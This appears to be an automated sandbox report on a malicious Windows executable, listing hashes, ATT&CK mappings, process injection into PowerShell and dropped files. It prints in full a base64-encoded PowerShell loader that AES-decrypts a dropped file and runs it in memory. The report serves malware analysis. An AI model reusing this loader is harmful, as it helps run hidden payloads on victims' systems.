7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3

General

Target

7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3.exe
Size

883KB
MD5

ae39044d41f62488dea12662933c752b
SHA1

9e4d4d14d9f07643a50d18b0c8d592689dcd79b9
SHA256

7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3
SHA512

2ba03922e1e9fc58260f4b903e79c4dc8b98ba2be0e6593617a3acd4d4ef16a1bffe2f17a72fdc449cb80b07512b49194b945426122bfe3a8013200e12fc645f
SSDEEP

12288:SDyyaNPCZ+XH47vhms5uEA8U97YGzhg22GH6eLQhVaxvbdI2N8wraHnF:SEUDDhml97fTRHdEQbOO8h

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2184	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2184	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2184	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 2184	2040	7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3.exe	29
PID 2040 wrote to memory of 2184	2040	7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3.exe	29
PID 2040 wrote to memory of 2184	2040	7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3.exe	29

C:\Users\Admin\AppData\Local\Temp\7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3.exe
"C:\Users\Admin\AppData\Local\Temp\7fdb767399b8fbdc5c2957039b5b6913d3b7c6781d5055e2be365d136530f2a3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA2AEMALAAgADAAeAAwADIALAAgADAAeABFADcALAAgADAAeAAxADAALAAgADAAeABDADcALAAgADAAeAA4ADgALAAgADAAeABEADEALAAgADAAeAAwAEUALAAgADAAeAA0AEIALAAgADAAeAA3ADkALAAgADAAeAA0ADQALAAgADAAeABGAEQALAAgADAAeABBADQALAAgADAAeABFADgALAAgADAAeAA2ADAALAAgADAAeABCADAALAAgADAAeAAwAEMALAAgADAAeAAzAEMALAAgADAAeABGADAALAAgADAAeAA3ADgALAAgADAAeAA2AEYALAAgADAAeAA2ADYALAAgADAAeAAzADIALAAgADAAeAAyADIALAAgADAAeABEADgALAAgADAAeABFADAALAAgADAAeABFAEEALAAgADAAeAAwADQALAAgADAAeAA2ADYALAAgADAAeAA0ADIALAAgADAAeABCAEMALAAgADAAeAA2ADgAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADkANAAsACAAMAB4ADkARAAsACAAMAB4ADgAMQAsACAAMAB4AEQARAAsACAAMAB4ADAAMgAsACAAMAB4ADkAMgAsACAAMAB4ADMAMQAsACAAMAB4ADgAQwAsACAAMAB4ADkANQAsACAAMAB4ADkARAAsACAAMAB4ADUANgAsACAAMAB4AEIAOAAsACAAMAB4AEUAMAAsACAAMAB4AEEAOAAsACAAMAB4ADkAMwAsACAAMAB4ADEANwApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-21615.putik

Filesize
20KB

MD5
f80e8d54fdd9888b22cf16d0e493bd46

SHA1
5e6dd500ab9e7f022fbf1b20cf9a044bd1dd5183

SHA256
f1e0cbee29065b843bab17c6947d13f069acb0855e2b926c03c6f5c22928a8d5

SHA512
f9a4569261e175f6f93087a77dc23cb25fc1658c2aa8bd67d7a0aeb001656feeb80634ba402c13ebec98e43229146dd239678f6f5f5dd574ed7191a1d400ccfb

Download Submit
memory/2184-5-0x000007FEF639E000-0x000007FEF639F000-memory.dmp

Filesize
4KB

Download
memory/2184-6-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2184-8-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-7-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/2184-9-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-10-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-11-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-12-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

Filesize
9.6MB

Download
memory/2184-14-0x0000000002C80000-0x0000000002C8A000-memory.dmp

Filesize
40KB

Download
memory/2184-15-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing